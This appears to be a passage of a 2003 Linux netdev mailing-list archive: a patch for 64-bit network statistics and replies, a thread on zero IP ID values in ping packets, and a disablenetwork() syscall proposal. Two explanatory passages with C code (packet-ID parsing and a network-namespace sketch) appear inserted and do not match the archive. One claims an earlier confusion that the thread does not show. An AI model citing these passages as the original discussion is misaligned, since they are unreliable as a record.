Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="netstats64.diff"

===== include/linux/netdevice.h 1.45 vs edited =====
--- 1.45/include/linux/netdevice.h	Wed Jul 2 09:20:08 2003
+++ edited/include/linux/netdevice.h	Mon Jul 7 15:09:05 2003
@@ -91,41 +91,83 @@
 #endif

 /*
+ * Macros for lockless 64 bit netdevice statistics. On 32-bit arches
+ * the counter is checked periodically for overflows. The overflows
+ * are carried in name_high. The updates are not atomic, there is a
+ * race between updating and reading the counters, however this is a
+ * very rare condition.
+ */
+
+#if (BITS_PER_LONG == 64)
+
+#define DECLARE_NETSTAT64(name) \
+	unsigned long name
+#define NETSTAT64(stats, name) \
+	((unsigned long long)(stats)->name)
+
+#else
+
+#define DECLARE_NETSTAT64(name) \
+	unsigned long name; \
+	unsigned long name##_high; \
+	unsigned long name##_last
+
+#define NETSTAT64(stats, name) \
+({ \
+	unsigned long cnt = (stats)->name; \
+	int carry = (stats)->name##_last > cnt; \
+	((unsigned long long)((stats)->name##_high + carry) << 32 | cnt); \
+})
+
+#define NETSTAT64_SYNC(stats, name) \
+do { \
+	unsigned long cnt = (stats)->name; \
+	if ((stats)->name##_last > cnt) \
+		(stats)->name##_high++; \
+	(stats)->name##_last = cnt; \
+} while(0)
+
+/* 32bit overflow about every 34s at full gigabit speed */
+#define NETSTATS64_SYNC_INTERVAL 30
+
+#endif
+
+/*
  *	Network device statistics. Akin to the 2.0 ether stats but
  *	with byte counters.
  */

 struct net_device_stats
 {
-	unsigned long rx_packets;	/* total packets received */
-	unsigned long tx_packets;	/* total packets transmitted */
-	unsigned long rx_bytes;		/* total bytes received */
-	unsigned long tx_bytes;		/* total bytes transmitted */
-	unsigned long rx_errors;	/* bad packets received */
-	unsigned long tx_errors;	/* packet transmit problems */
-	unsigned long rx_dropped;	/* no space in linux buffers */
-	unsigned long tx_dropped;	/* no space available in linux */
-	unsigned long multicast;	/* multicast packets received */
-	unsigned long collisions;
+	DECLARE_NETSTAT64(rx_packets);	/* total packets received */
+	DECLARE_NETSTAT64(tx_packets);	/* total packets transmitted */
+	DECLARE_NETSTAT64(rx_bytes);	/* total bytes received */
+	DECLARE_NETSTAT64(tx_bytes);	/* total bytes transmitted */
+	DECLARE_NETSTAT64(rx_errors);	/* bad packets received */
+	DECLARE_NETSTAT64(tx_errors);	/* packet transmit problems */
+	DECLARE_NETSTAT64(rx_dropped);	/* no space in linux buffers */
+	DECLARE_NETSTAT64(tx_dropped);	/* no space available in linux */
+	DECLARE_NETSTAT64(multicast);	/* multicast packets received */
+	DECLARE_NETSTAT64(collisions);

 	/* detailed rx_errors: */
-	unsigned long rx_length_errors;
-	unsigned long rx_over_errors;	/* receiver ring buff overflow */
-	unsigned long rx_crc_errors;	/* recved pkt with crc error */
-	unsigned long rx_frame_errors;	/* recv'd frame alignment error */
-	unsigned long rx_fifo_errors;	/* recv'r fifo overrun */
-	unsigned long rx_missed_errors;	/* receiver missed packet */
+	DECLARE_NETSTAT64(rx_length_errors);
+	DECLARE_NETSTAT64(rx_over_errors);	/* receiver ring buff overflow */
+	DECLARE_NETSTAT64(rx_crc_errors);	/* recved pkt with crc error */
+	DECLARE_NETSTAT64(rx_frame_errors);	/* recv'd frame alignment error */
+	DECLARE_NETSTAT64(rx_fifo_errors);	/* recv'r fifo overrun */
+	DECLARE_NETSTAT64(rx_missed_errors);	/* receiver missed packet */

 	/* detailed tx_errors */
-	unsigned long tx_aborted_errors;
-	unsigned long tx_carrier_errors;
-	unsigned long tx_fifo_errors;
-	unsigned long tx_heartbeat_errors;
-	unsigned long tx_window_errors;
+	DECLARE_NETSTAT64(tx_aborted_errors);
+	DECLARE_NETSTAT64(tx_carrier_errors);
+	DECLARE_NETSTAT64(tx_fifo_errors);
+	DECLARE_NETSTAT64(tx_heartbeat_errors);
+	DECLARE_NETSTAT64(tx_window_errors);

 	/* for cslip etc */
-	unsigned long rx_compressed;
-	unsigned long tx_compressed;
+	DECLARE_NETSTAT64(rx_compressed);
+	DECLARE_NETSTAT64(tx_compressed);
 };


===== net/core/dev.c 1.89 vs edited =====
--- 1.89/net/core/dev.c	Thu Jul 3 09:32:44 2003
+++ edited/net/core/dev.c	Mon Jul 7 13:53:38 2003
@@ -1869,23 +1870,33 @@
 	struct net_device_stats *stats = dev->get_stats ? dev->get_stats(dev) :
 		NULL;
 	if (stats)
-		seq_printf(seq, "%6s:%8lu %7lu %4lu %4lu %4lu %5lu %10lu %9lu "
-				"%8lu %7lu %4lu %4lu %4lu %5lu %7lu %10lu\n",
-			   dev->name, stats->rx_bytes, stats->rx_packets,
-			   stats->rx_errors,
-			   stats->rx_dropped + stats->rx_missed_errors,
-			   stats->rx_fifo_errors,
-			   stats->rx_length_errors + stats->rx_over_errors +
-			     stats->rx_crc_errors + stats->rx_frame_errors,
-			   stats->rx_compressed, stats->multicast,
-			   stats->tx_bytes, stats->tx_packets,
-			   stats->tx_errors, stats->tx_dropped,
-			   stats->tx_fifo_errors, stats->collisions,
-			   stats->tx_carrier_errors +
-			     stats->tx_aborted_errors +
-			     stats->tx_window_errors +
-			     stats->tx_heartbeat_errors,
-			   stats->tx_compressed);
+		seq_printf(seq, "%6s:%8llu %7llu %4llu %4llu %4llu %5llu "
+				"%10llu %9llu %8llu %7llu %4llu %4llu %4llu "
+				"%5llu %7llu %10llu\n",
+			   dev->name,
+			   NETSTAT64(stats, rx_bytes),
+			   NETSTAT64(stats, rx_packets),
+			   NETSTAT64(stats, rx_errors),
+			   NETSTAT64(stats, rx_dropped) +
+			     NETSTAT64(stats, rx_missed_errors),
+			   NETSTAT64(stats, rx_fifo_errors),
+			   NETSTAT64(stats, rx_length_errors) +
+			     NETSTAT64(stats, rx_over_errors) +
+			     NETSTAT64(stats, rx_crc_errors) +
+			     NETSTAT64(stats, rx_frame_errors),
+			   NETSTAT64(stats, rx_compressed),
+			   NETSTAT64(stats, multicast),
+			   NETSTAT64(stats, tx_bytes),
+			   NETSTAT64(stats, tx_packets),
+			   NETSTAT64(stats, tx_errors),
+			   NETSTAT64(stats, tx_dropped),
+			   NETSTAT64(stats, tx_fifo_errors),
+			   NETSTAT64(stats, collisions),
+			   NETSTAT64(stats, tx_carrier_errors) +
+			     NETSTAT64(stats, tx_aborted_errors) +
+			     NETSTAT64(stats, tx_window_errors) +
+			     NETSTAT64(stats, tx_heartbeat_errors),
+			   NETSTAT64(stats, tx_compressed));
 	else
 		seq_printf(seq, "%6s: No statistics available.\n", dev->name);
 }
@@ -2943,6 +2954,56 @@
 	return 0;
 }

+#if (BITS_PER_LONG != 64)
+static void netstats64_sync_work(void *);
+static DECLARE_WORK(netstats64_work, netstats64_sync_work, NULL);
+
+static inline void netstats64_schedule_work(void)
+{
+	schedule_delayed_work(&netstats64_work, NETSTATS64_SYNC_INTERVAL * HZ);
+}
+
+static void netstats64_sync_work(void *data)
+{
+	struct net_device *dev;
+	struct net_device_stats *stats;
+
+	read_lock_bh(&dev_base_lock);
+	for (dev = dev_base; dev; dev = dev->next) {
+		stats = dev->get_stats ? dev->get_stats(dev) : NULL;
+		if (!stats)
+			continue;
+		NETSTAT64_SYNC(stats, rx_packets);
+		NETSTAT64_SYNC(stats, tx_packets);
+		NETSTAT64_SYNC(stats, rx_bytes);
+		NETSTAT64_SYNC(stats, tx_bytes);
+		NETSTAT64_SYNC(stats, rx_errors);
+		NETSTAT64_SYNC(stats, tx_errors);
+		NETSTAT64_SYNC(stats, rx_dropped);
+		NETSTAT64_SYNC(stats, tx_dropped);
+		NETSTAT64_SYNC(stats, multicast);
+		NETSTAT64_SYNC(stats, collisions);
+
+		NETSTAT64_SYNC(stats, rx_length_errors);
+		NETSTAT64_SYNC(stats, rx_over_errors);
+		NETSTAT64_SYNC(stats, rx_crc_errors);
+		NETSTAT64_SYNC(stats, rx_frame_errors);
+		NETSTAT64_SYNC(stats, rx_fifo_errors);
+		NETSTAT64_SYNC(stats, rx_missed_errors);
+
+		NETSTAT64_SYNC(stats, tx_aborted_errors);
+		NETSTAT64_SYNC(stats, tx_carrier_errors);
+		NETSTAT64_SYNC(stats, tx_fifo_errors);
+		NETSTAT64_SYNC(stats, tx_heartbeat_errors);
+		NETSTAT64_SYNC(stats, tx_window_errors);
+
+		NETSTAT64_SYNC(stats, rx_compressed);
+		NETSTAT64_SYNC(stats, tx_compressed);
+	}
+	read_unlock_bh(&dev_base_lock);
+	netstats64_schedule_work();
+}
+#endif

 /*
  *	Initialize the DEV module. At boot time this walks the device list and
@@ -3082,6 +3143,9 @@
 #ifdef CONFIG_NET_SCHED
 	pktsched_init();
+#endif
+#if (BITS_PER_LONG != 64)
+	netstats64_schedule_work();
 #endif

 	rc = 0;
 out:
===== net/core/net-sysfs.c 1.7 vs edited =====
--- 1.7/net/core/net-sysfs.c	Sun Jun 15 10:21:46 2003
+++ edited/net/core/net-sysfs.c	Mon Jul 7 13:57:11 2003
@@ -184,9 +184,9 @@
 	ssize_t (*store)(struct net_device_stats *, const char *, size_t);
 };

-static ssize_t net_device_stat_show(unsigned long var, char *buf)
+static ssize_t net_device_stat_show(unsigned long long var, char *buf)
 {
-	return sprintf(buf, "%ld\n", var);
+	return sprintf(buf, "%lld\n", var);
 }

 /* generate a read-only statistics attribute */
@@ -194,7 +194,7 @@
 static ssize_t show_stat_##_NAME(const struct net_device_stats *stats, \
 				 char *buf) \
 { \
-	return net_device_stat_show(stats->_NAME, buf); \
+	return net_device_stat_show(NETSTAT64(stats, _NAME), buf); \
 } \
 static struct netstat_fs_entry net_stat_##_NAME = { \
 	.attr = {.name = __stringify(_NAME), .mode = S_IRUGO }, \

--------------050706090100050808080106--

From garzik@gtf.org Mon Jul 7 07:30:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 07:30:58 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67EUH2x029935 for ; Mon, 7 Jul 2003 07:30:18 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id C9605664E; Mon, 7 Jul 2003 10:30:11 -0400 (EDT) Date: Mon, 7 Jul 2003 10:30:11 -0400 From: Jeff Garzik To: Patrick McHardy Cc: Linux Kernel Mailing List , netdev@oss.sgi.com Subject: Re: RFC: another approach for 64-bit network stats Message-ID: <20030707143011.GA14787@gtf.org> References: <3F097E4D.1080707@trash.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F097E4D.1080707@trash.net> User-Agent: Mutt/1.3.28i X-archive-position: 3803 X-ecartis-version:
Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev If you don't want to poll periodically for network stats, as has been repeatedly suggested, you can always poll periodically for the 64-bit NIC-specific stats that most gige adapters provide these days, using ethtool. NIC-specific stats also tend to provide more fine granularity than the current net_device_stats members. Jeff From greearb@candelatech.com Mon Jul 7 09:53:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 09:53:33 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67GrN2x032570 for ; Mon, 7 Jul 2003 09:53:24 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h67GrIKk021734; Mon, 7 Jul 2003 09:53:18 -0700 Message-ID: <3F09A57D.8030003@candelatech.com> Date: Mon, 07 Jul 2003 09:53:17 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Patrick McHardy CC: Linux Kernel Mailing List , netdev@oss.sgi.com Subject: Re: RFC: another approach for 64-bit network stats References: <3F097E4D.1080707@trash.net> In-Reply-To: <3F097E4D.1080707@trash.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3804 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Patrick McHardy wrote: > This patch implements a lockless aproach for 64-bit netstatistics with > only a very rare > racecondition. On 64 bit system, nothing is changed. 
On 32 bit system I think that you should consider providing a new API as opposed to breaking existing APIs. And, perhaps this new API could deal with the very rare race to make it never happen? No matter how rare it is, you still have to write code to work around it if it exists..might as well do it once in the kernel instead of making each user of the interface deal with it. Personally, I'd like to see the net-device stats (64-bit or otherwise) available through the ethtool interface in a well defined binary package (perhaps a struct net_device_stats, or similar.) Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From jeffpc@optonline.net Mon Jul 7 10:34:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 10:34:12 -0700 (PDT) Received: from mta9.srv.hcvlny.cv.net (mta9.srv.hcvlny.cv.net [167.206.5.42]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67HY12x000816 for ; Mon, 7 Jul 2003 10:34:02 -0700 Received: from asv7.srv.hcvlny.cv.net (asv7.srv.hcvlny.cv.net [167.206.5.43]) by mta9.srv.hcvlny.cv.net (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTP id <0HHO00I0V0RZAL@mta9.srv.hcvlny.cv.net> for netdev@oss.sgi.com; Mon, 07 Jul 2003 13:33:36 -0400 (EDT) Received: from jeff.home (ool-44c2049f.dyn.optonline.net [68.194.4.159]) by asv7.srv.hcvlny.cv.net (8.12.9/8.12.9) with ESMTP id h67HXjMP010298; Mon, 07 Jul 2003 13:33:48 -0400 (EDT) Date: Mon, 07 Jul 2003 13:33:43 -0400 From: Jeff Sipek Subject: Re: RFC: another approach for 64-bit network stats In-reply-to: <3F09A57D.8030003@candelatech.com> To: Ben Greear , Patrick McHardy Cc: Linux Kernel Mailing List , netdev@oss.sgi.com Message-id: <200307071333.48179.jeffpc@optonline.net> MIME-version: 1.0 Content-type: Text/Plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT Content-disposition: inline Content-description: clearsigned data User-Agent: KMail/1.5.2 References: 
<3F097E4D.1080707@trash.net> <3F09A57D.8030003@candelatech.com> X-archive-position: 3805 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jeffpc@optonline.net Precedence: bulk X-list: netdev -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Monday 07 July 2003 12:53, Ben Greear wrote: > I think that you should consider providing a new API as opposed to > breaking existing APIs. Do you mean reworking the network statistics side of networking? Jeff. - -- Please avoid sending me Word or PowerPoint attachments. See http://www.fsf.org/philosophy/no-word-attachments.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/Ca77wFP0+seVj/4RArtOAJwNVhV9PNgyli/d93n4ocCaRZzxmACeMdr8 9W0vfMOt76DNXq2t4Phoye0= =8LGV -----END PGP SIGNATURE----- From alex@pilosoft.com Mon Jul 7 11:07:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 11:07:38 -0700 (PDT) Received: from paix.pilosoft.com ([216.66.12.246]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67I7V2x001519 for ; Mon, 7 Jul 2003 11:07:31 -0700 Received: from localhost (alex@localhost) by paix.pilosoft.com (8.11.6/8.11.6) with ESMTP id h67H3Se05912 for ; Mon, 7 Jul 2003 13:03:28 -0400 Date: Mon, 7 Jul 2003 13:03:27 -0400 (EDT) From: alex@pilosoft.com To: netdev@oss.sgi.com Subject: route-cache status? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3806 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alex@pilosoft.com Precedence: bulk X-list: netdev Hello, i've been following discussions a few weeks ago regarding developments of route cache, and am trying to develop conclusion of the current best code base. From list, it seems that 2.4.20 is still better than 2.5.70+davem patches or 2.4.21. Am I correct? Are there any newer patches available? 
-alex From ra993482@ic.unicamp.br Mon Jul 7 12:07:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 12:07:19 -0700 (PDT) Received: from itaqui.terra.com.br (itaqui.terra.com.br [200.176.3.19]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67J732x002225 for ; Mon, 7 Jul 2003 12:07:03 -0700 Received: from tucuriba.terra.com.br (tucuriba.terra.com.br [200.176.3.53]) by itaqui.terra.com.br (Postfix) with ESMTP id 576D6810505; Mon, 7 Jul 2003 15:39:12 -0300 (BRT) Received: from ryback.home.net (unknown [200.232.206.224]) (authenticated user macwad) by tucuriba.terra.com.br (Postfix) with ESMTP id CB06D2641EC; Mon, 7 Jul 2003 15:39:10 -0300 (BRT) Subject: Re: IP-ID field of ICMP echo request From: Ulisses To: Kohei OHTA Cc: netdev@oss.sgi.com In-Reply-To: <3F095B7B.5090203@cysols.com> References: <3F095B7B.5090203@cysols.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 (1.0.8-9.7x.1) Date: 07 Jul 2003 15:40:36 -0300 Message-Id: <1057603237.1001.18.camel@ryback> Mime-Version: 1.0 X-archive-position: 3807 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ra993482@ic.unicamp.br Precedence: bulk X-list: netdev On Mon, 2003-07-07 at 08:37, Kohei OHTA wrote: > I found a strange packet, which is generated by ping of Linux. > It is observed ID field of IP header in ping packet (Echo request) is always 0. > > I confirmed this on kernel 2.4.18 and 2.4.21. > My colleague also confirmed this is fixed in kernel 2.5.74. > > I hope this is fixed in next next 2.4.x release. Hi, Kohei, I guess this behaviour is to prevent Idle scanning, that is based on predictable IPID numbers [1]. Therefore, the Linux TCP/IP stack uses 0 as IPID when the DF (Don't Fragment) bit is set. I'm not sure, but I think that Linux also uses peer-specific IPID numbers to make the prediction harder. 
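The two fields that were confused earlier in this thread, the IP Identification field (RFC 791) and the ICMP echo Identifier (RFC 792), sit at different offsets and can be read side by side from a captured packet. The following is a minimal sketch under stated assumptions: the buffer holds a raw IPv4 packet with no link-layer header, and struct ip_id_info and parse_echo are hypothetical names, not part of any kernel or library API. It also extracts the DF bit, since the behaviour discussed here (IP ID of 0) is reported only for packets sent with DF set.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical result type for this illustration. */
struct ip_id_info {
	uint16_t ip_id;   /* IPv4 Identification, header bytes 4-5 (RFC 791) */
	int      df;      /* 1 if the Don't Fragment flag is set */
	uint16_t icmp_id; /* ICMP echo Identifier, ICMP bytes 4-5 (RFC 792) */
};

/* Parse a raw IPv4 packet carrying an ICMP echo request or reply.
 * Returns 0 on success, -1 if the buffer is not such a packet. */
static int parse_echo(const uint8_t *pkt, size_t len, struct ip_id_info *out)
{
	size_t ihl;

	assert(pkt != NULL && out != NULL);
	if (len < 20 || (pkt[0] >> 4) != 4)   /* too short or not IPv4 */
		return -1;
	ihl = (size_t)(pkt[0] & 0x0F) * 4;    /* header length in bytes */
	if (ihl < 20 || len < ihl + 8)        /* need 8 bytes of ICMP header */
		return -1;
	if (pkt[9] != 1)                      /* protocol 1 = ICMP */
		return -1;
	if (pkt[ihl] != 8 && pkt[ihl] != 0)   /* echo request / echo reply */
		return -1;

	out->ip_id = (uint16_t)((pkt[4] << 8) | pkt[5]);
	out->df = (pkt[6] & 0x40) != 0;       /* flags: top 3 bits of byte 6 */
	out->icmp_id = (uint16_t)((pkt[ihl + 4] << 8) | pkt[ihl + 5]);
	return 0;
}
```

Fed with the bytes of an echo request captured from one of the kernels mentioned above, this would be expected to report ip_id 0 together with df 1, while icmp_id remains whatever the ping process chose.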
-- Ulisses [1] http://www.insecure.org/nmap/idlescan.html From pekkas@netcore.fi Mon Jul 7 12:40:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 12:40:16 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Je92x006123 for ; Mon, 7 Jul 2003 12:40:11 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h67Je3716261 for ; Mon, 7 Jul 2003 22:40:03 +0300 Date: Mon, 7 Jul 2003 22:40:02 +0300 (EEST) From: Pekka Savola To: netdev@oss.sgi.com Subject: disablenetwork() syscall? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3808 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev Hi, In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure has been brought up in the past. I'm not sure whether it's feasible or not, but at least it (and other methods to limit the functions of a user-level code) might bear consideration. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings ---------- Forwarded message ---------- Date: 4 Jul 2003 23:17:20 -0000 From: D. J. Bernstein To: bugtraq@securityfocus.com Subject: Re: Email marketing company gives out questionable security advice [...] P.S. It's hard for a portable chroot tool to cut off a program's network access. Kernel designers should provide a disablenetwork() syscall, with the disabling inherited by children. Other kernel changes would be nice, but disablenetwork() is the only critical change. 
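The disablenetwork() call proposed in the P.S. above is hypothetical; it is not an existing Linux interface. As a rough illustration of the same idea, Linux kernels released well after this thread provide network namespaces: a process that calls unshare(CLONE_NEWNET) is moved into a fresh namespace containing only a loopback device that is initially down, and children created afterwards inherit that namespace. The sketch below assumes such a kernel and sufficient privilege (CAP_SYS_ADMIN). The function name disable_network_sketch is made up for this example and is a swapped-in technique, not the syscall Bernstein asked for.

```c
/* Sketch only: approximates the proposed disablenetwork() with a network
 * namespace. unshare(CLONE_NEWNET) is a real Linux call, but it postdates
 * this thread; disable_network_sketch() is a hypothetical name. */
#define _GNU_SOURCE
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>

/* Returns 0 on success, -1 on failure with errno as set by unshare(). */
int disable_network_sketch(void)
{
    if (unshare(CLONE_NEWNET) == -1) {
        int saved = errno;  /* fprintf() may clobber errno */
        fprintf(stderr, "unshare(CLONE_NEWNET): %s\n", strerror(saved));
        errno = saved;
        return -1;
    }
    /* From here on, this process and any children it forks see only the
     * new namespace's loopback device, which starts out down. */
    return 0;
}
```

A sandboxing tool would presumably call this once, before chroot(), dropping its uid, and exec'ing the untrusted program, so that the restriction is already in place when the child starts.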
From garzik@gtf.org Mon Jul 7 12:47:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 12:47:09 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Jl32x006478 for ; Mon, 7 Jul 2003 12:47:05 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id EE0936652; Mon, 7 Jul 2003 15:46:57 -0400 (EDT) Date: Mon, 7 Jul 2003 15:46:57 -0400 From: Jeff Garzik To: Pekka Savola Cc: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? Message-ID: <20030707194657.GA11328@gtf.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i X-archive-position: 3809 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Mon, Jul 07, 2003 at 10:40:02PM +0300, Pekka Savola wrote: > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > has been brought up in the past. I'm not sure whether it's feasible or > not, but at least it (and other methods to limit the functions of a > user-level code) might bear consideration. What about some URLs to what you are describing? The most information you provided was in $subject, whose content makes me a bit leery... Jeff From pekkas@netcore.fi Mon Jul 7 12:52:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 12:52:32 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67JqP2x006946 for ; Mon, 7 Jul 2003 12:52:26 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h67JqFR16467; Mon, 7 Jul 2003 22:52:15 +0300 Date: Mon, 7 Jul 2003 22:52:15 +0300 (EEST) From: Pekka Savola To: Jeff Garzik cc: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? 
In-Reply-To: <20030707194657.GA11328@gtf.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3810 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Mon, 7 Jul 2003, Jeff Garzik wrote: > On Mon, Jul 07, 2003 at 10:40:02PM +0300, Pekka Savola wrote: > > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > > has been brought up in the past. I'm not sure whether it's feasible or > > not, but at least it (and other methods to limit the functions of a > > user-level code) might bear consideration. > > What about some URLs to what you are describing? > > The most information you provided was in $subject, whose content > makes me a bit leery... Well, apart from the post scriptum, there was very little content about the feature/idea :-), and the details would seem to be up for everyone's imagination. FWIW, the body of the message is below: ===== Richard M. Smith writes: [ mail readers disabling inline images ] > It will be interesting to see how email marketing companies and > spammers adapt to these technical changes in HTML email. ASCII porn, perhaps? Especially if the sender can control the color, and size, of text. I suppose those will be the next casualties in the war on spam. It's quite depressing that this is what people think of as ``security'': patch maniacally; install a scanner that checks for yesterday's attacks; don't view the pictures, don't drink the water, don't breathe the air. I've been playing with a radically different system design (I'm thinking of calling it ``UNIX'') where conceptually separate tasks are split into separate processes. 
If you want to gunzip a stream of data, for example, you run a gunzip program in its own chroot jail, under its own uid, with no way to read any interesting data except through a predefined IPC hook (I'm thinking of calling that a ``pipe'' on ``standard input'') and with no way to touch anything except through another predefined IPC hook. The only thing that an attacker can do by taking over this gunzip program is generate arbitrary output data, which he could have done anyway. Typical picture-generating programs can be isolated in the same way. ==== -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mitch@sfgoth.com Mon Jul 7 13:57:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 13:58:03 -0700 (PDT) Received: from gaz.sfgoth.com ([63.205.85.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Kvt2x007783 for ; Mon, 7 Jul 2003 13:57:56 -0700 Received: from gaz.sfgoth.com (localhost.sfgoth.com [127.0.0.1]) by gaz.sfgoth.com (8.12.6p2/8.12.6) with ESMTP id h67L3Alx022365; Mon, 7 Jul 2003 14:03:10 -0700 (PDT) (envelope-from mitch@gaz.sfgoth.com) Received: (from mitch@localhost) by gaz.sfgoth.com (8.12.6p2/8.12.6/Submit) id h67L3Amn022364; Mon, 7 Jul 2003 14:03:10 -0700 (PDT) (envelope-from mitch) Date: Mon, 7 Jul 2003 14:03:10 -0700 From: Mitchell Blank Jr To: Pekka Savola Cc: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? Message-ID: <20030707210310.GA21759@gaz.sfgoth.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4.1i X-archive-position: 3811 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mitch@sfgoth.com Precedence: bulk X-list: netdev Pekka Savola wrote: > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > has been brought up in the past. 
I'm not sure whether it's feasible or > not, but at least it (and other methods to limit the functions of a > user-level code) might bear consideration. It sounds like something that could be implemented as a capability (CAP_NET_ACCESS or such) -Mitch From palbrecht@qwest.net Mon Jul 7 14:34:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 14:34:19 -0700 (PDT) Received: from mpls-qmqp-03.inet.qwest.net (mpls-qmqp-03.inet.qwest.net [63.231.195.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67LY62x008454 for ; Mon, 7 Jul 2003 14:34:07 -0700 Received: (qmail 21795 invoked by uid 0); 7 Jul 2003 21:26:47 -0000 Received: from mpls-pop-07.inet.qwest.net (63.231.195.7) by mpls-qmqp-03.inet.qwest.net with QMQP; 7 Jul 2003 21:26:47 -0000 Received: from 0-1pool152-236.nas9.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.152.236) by mpls-pop-07.inet.qwest.net with SMTP; 7 Jul 2003 21:34:05 -0000 Date: Mon, 7 Jul 2003 16:30:47 -0700 Message-ID: <001401c344df$ccbc63c0$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Nivedita Singhvi" Cc: linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com> 